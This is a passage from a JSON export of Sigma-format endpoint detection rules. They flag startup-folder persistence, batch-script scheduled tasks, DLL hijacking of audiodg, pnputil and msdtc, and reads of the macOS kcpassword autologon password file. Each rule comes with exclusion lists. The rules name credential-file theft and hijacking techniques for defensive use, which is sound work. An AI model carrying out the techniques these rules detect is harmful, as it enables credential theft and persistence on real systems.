8620\\bin\\HPStatusBL.dll,RunDLLEntry SERIALNUMBER=CN639FXXXXXW08W;CONNECTION=USB;MONITOR=1;\n # target : C:\\Users\\xxxx\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Superviser les alertes relatives aux cartouches - HP ENVY 5540 series.lnk\n ProcessCommandLine: '?:\\Windows\\system32\\RunDll32.exe ?:\\Program Files\\HP\\\\*\\bin\\HPStatusBL.dll,RunDLLEntry *'\n\n exclusion_wapt:\n - Image|endswith: '\\waptagent.tmp' # C:\\Windows\\Temp\\is-M2GTK.tmp\\waptagent.tmp\n Path:\n - '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WAPT session setup.lnk'\n - '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\WAPT tray helper.lnk'\n - ProcessGrandparentImage: '?:\\Program Files (x86)\\wapt\\waptconsole.exe'\n\n exclusion_elster_authenticator:\n # C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\i4j13789909157672610629.tmp\n # C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\i4j_writeperm_test\n # C:\\Users\\xxxx\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\i4j17134246450829547984.tmp\n Image|contains: '\\.elster-authenticator\\updater\\ElsterAuthenticatorInstaller.exe'\n Path: '*\\Start Menu\\Programs\\StartUp\\i4j*'\n\n exclusion_deepl:\n Image|endswith: '\\DeepL.exe'\n Path|endswith: '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DeepL.lnk'\n\n exclusion_hp_monitoring:\n # c:\\windows\\system32\\rundll32.exe c:\\program files\\hp\\hp deskjet 3510 series\\bin\\hpstatusbl.dll,rundllentry serialnumber=xxxxxxx;connection=usb;monitor=1\n # c:\\windows\\system32\\rundll32.exe c:\\program files\\hp\\hp smart tank plus 570 series\\bin\\hpstatusbl.dll,rundllentry serialnumber=cn11h4s0g2;connection=usb;monitor=1\n ProcessCommandLine|contains|all:\n - '?:\\windows\\system32\\rundll32.exe'\n - '\\bin\\hpstatusbl.dll,rundllentry'\n # programs\\startup\\monitor ink alerts - hp deskjet 2000 j210 series.lnk;\n # programs\\startup\\alertes de surveillance de l'encre - hp deskjet 2540 series.lnk\n Path: 'appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\\\* hp *.lnk'\n\n exclusion_zero_install:\n ProcessCommandLine: '*\\AppData\\Roaming\\Programs\\Zero Install\\0install.exe'\n Path: '*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DeepL auto-start.lnk'\n\n exclusion_eolis:\n ProcessCommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\setup_pm.exe'\n - '?:\\Program Files\\Evolis Card Printer'\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Evolis Printer Manager.lnk'\n\n exclusion_canon:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\EOS Utility.lnk'\n\n exclusion_emeditor:\n Image: '*\\AppData\\Local\\Programs\\EmEditor\\EmEditor.exe'\n Path: '*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\EmEditor.lnk'\n\n exclusion_oobe:\n ProcessCommandLine: '?:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE shsetup.dll,SHUnattendedSetup specialize'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n\n exclusion_rustdesk:\n ProcessParentImage: '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\rustdesk\\rustdesk.exe'\n Path: '?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\RustDesk Tray.lnk'\n\n exclusion_podman:\n Image|endswith: '\\Podman Desktop.exe'\n Path|endswith: '\\podman-desktop.vbs'\n\n exclusion_printer:\n ProcessParentImage: '?:\\Windows\\System32\\msiexec.exe'\n Path|endswith: '\\Error Recovery Guide.lnk'\n\n exclusion_spool:\n ProcessCommandLine|startswith:\n - 'rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_ccm:\n - ProcessParentImage:\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessCommandLine|contains: '?:\\Windows\\ccmcache\\'\n\n exclusion_share:\n - ProcessAncestors|contains: '|\\\\\\\\'\n - ProcessCommandLine|contains:\n - 'cmd /c \\\\\\\\'\n - 'cmd.exe /c \\\\\\\\'\n - ProcessParentImage|startswith: '\\\\\\\\'\n - Path|startswith: '\\\\\\\\'\n\n exclusion_manageenfine:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\'\n\n exclusion_shellpreviewhost:\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc3a404c-7d79-4d07-975a-c7ccf40276cf",
"rule_name": "File Added/Modified in Startup Directory",
"rule_description": "Detects when a file is added or modified in the startup directory.\nAdversaries may achieve persistence by adding a program to a startup folder.\nIt is recommended to investigate the content of the newly created file to determine if this action was legitimate.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc4003d0-b92e-4316-9e79-cab2b7d25546",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625640Z",
"creation_date": "2026-03-23T11:45:34.625642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625647Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/techniques/T1059/003/"
],
"name": "t1053_scheduled_task_batch_script_sus_loc.yml",
"content": "title: Scheduled Task with Batch Script Action Created in Suspicious Location\nid: fc4003d0-b92e-4316-9e79-cab2b7d25546\ndescription: |\n Detects a scheduled task being created with one of the actions launching a batch script from a suspicious location.\n It is common for attackers to create a scheduled task that launches a script or command that reestablishes a connection to their C&C servers as a way to create persistence or to decorrelate parent/child process relationships.\n It is recommended to investigate the concerned scheduled task by clicking the \"TaskInformation\" button as well as any spawned processes to determine if they are legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/techniques/T1059/003/\ndate: 2025/09/04\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.execution\n - attack.t1059.003\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection_bat:\n OperationType: 'create'\n TaskContent|contains:\n - '.bat'\n - '.bat?'\n\n selection_folder:\n TaskContent|contains:\n - '*?:\\Users\\Public'\n - '*?:\\ProgramData'\n - '*?:\\Windows'\n - '*?:\\Users\\\\*\\AppData'\n\n exclusion_landesk:\n FirstActionCommandLine|contains: '?:\\ProgramData\\LANDesk'\n\n exclusion_corsair_icue:\n FirstActionCommandLine:\n # Sometimes these are forward slashes\n - 'cmd.exe /c ?:\\WINDOWS?Temp?icue-rmdir-????????-????-????-????-????????????.bat'\n - 'cmd.exe /c ?:\\WINDOWS?Temp?icue-task-????????-????-????-????-????????????.bat'\n\n exclusion_sap_business_objects:\n FirstActionCommandLine|startswith: '?:\\ProgramData\\SAP BusinessObjects\\'\n\n exclusion_hp_support:\n FirstActionCommandLine|startswith: '?:\\ProgramData\\HP\\HP Support Framework\\'\n\n condition: selection_bat and selection_folder and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc4003d0-b92e-4316-9e79-cab2b7d25546",
"rule_name": "Scheduled Task with Batch Script Action Created in Suspicious Location",
"rule_description": "Detects a scheduled task being created with one of the actions launching a batch script from a suspicious location.\nIt is common for attackers to create a scheduled task that launches a script or command that reestablishes a connection to their C&C servers as a way to create persistence or to decorrelate parent/child process relationships.\nIt is recommended to investigate the concerned scheduled task by clicking the \"TaskInformation\" button as well as any spawned processes to determine if they are legitimate.\n",
"rule_creation_date": "2025-09-04",
"rule_modified_date": "2025-12-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc40ab14-a52d-4398-a930-6b613e5641ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096485Z",
"creation_date": "2026-03-23T11:45:34.096487Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096492Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_audiodg.yml",
"content": "title: DLL Hijacking via audioadg.exe\nid: fc40ab14-a52d-4398-a930-6b613e5641ab\ndescription: |\n Detects potential Windows DLL Hijacking via audioadg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'audioadg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mmdevapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc40ab14-a52d-4398-a930-6b613e5641ab",
"rule_name": "DLL Hijacking via audioadg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via audioadg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fc83fd01-91c6-4c20-8c00-dfa808a060f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076024Z",
"creation_date": "2026-03-23T11:45:34.076025Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076030Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pnputil.yml",
"content": "title: DLL Hijacking via pnputil.exe\nid: fc83fd01-91c6-4c20-8c00-dfa808a060f1\ndescription: |\n Detects potential Windows DLL Hijacking via pnputil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pnputil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\devobj.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fc83fd01-91c6-4c20-8c00-dfa808a060f1",
"rule_name": "DLL Hijacking via pnputil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pnputil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fca3a43d-b571-4277-91e9-109e94c8ef22",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594764Z",
"creation_date": "2026-03-23T11:45:34.594768Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msdtc.yml",
"content": "title: DLL Hijacking via msdtc.exe\nid: fca3a43d-b571-4277-91e9-109e94c8ef22\ndescription: |\n Detects potential Windows DLL Hijacking via msdtc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msdtc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLUSAPI.dll'\n - '\\DNSAPI.dll'\n - '\\ktmw32.dll'\n - '\\MSDTCTM.dll'\n - '\\MTXCLU.DLL'\n - '\\oci.dll'\n - '\\RESUTILS.dll'\n - '\\XOLEHLP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fca3a43d-b571-4277-91e9-109e94c8ef22",
"rule_name": "DLL Hijacking via msdtc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msdtc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fcbc82c7-c83f-40e4-891d-7804e51e594a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617248Z",
"creation_date": "2026-03-23T11:45:34.617250Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617255Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.offsec.com/blog/in-the-hunt-for-the-macos-autologin-setup-process/",
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_autologon_password_read.yml",
"content": "title: Suspicious Access to macOS Autologon Password File\nid: fcbc82c7-c83f-40e4-891d-7804e51e594a\ndescription: |\n Detects an attempt to read the content of the kcpassword file which holds users' passwords when autologin is enabled.\n Adversaries may access the autologon file to acquire credentials in order to impersonate users or elevate privileges.\n It is recommended to check for malicious behavior by the process accessing the file.\nreferences:\n - https://www.offsec.com/blog/in-the-hunt-for-the-macos-autologin-setup-process/\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_file:\n Path: '/Private/etc/kcpassword'\n selection_read_access:\n Kind: 'read'\n ProcessImage|contains: '?'\n\n # Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fcbc82c7-c83f-40e4-891d-7804e51e594a",
"rule_name": "Suspicious Access to macOS Autologon Password File",
"rule_description": "Detects an attempt to read the content of the kcpassword file which holds users' passwords when autologin is enabled.\nAdversaries may access the autologon file to acquire credentials in order to impersonate users or elevate privileges.\nIt is recommended to check for malicious behavior by the process accessing the file.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fcd5dfad-3e40-4d1a-9173-728d269423d0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
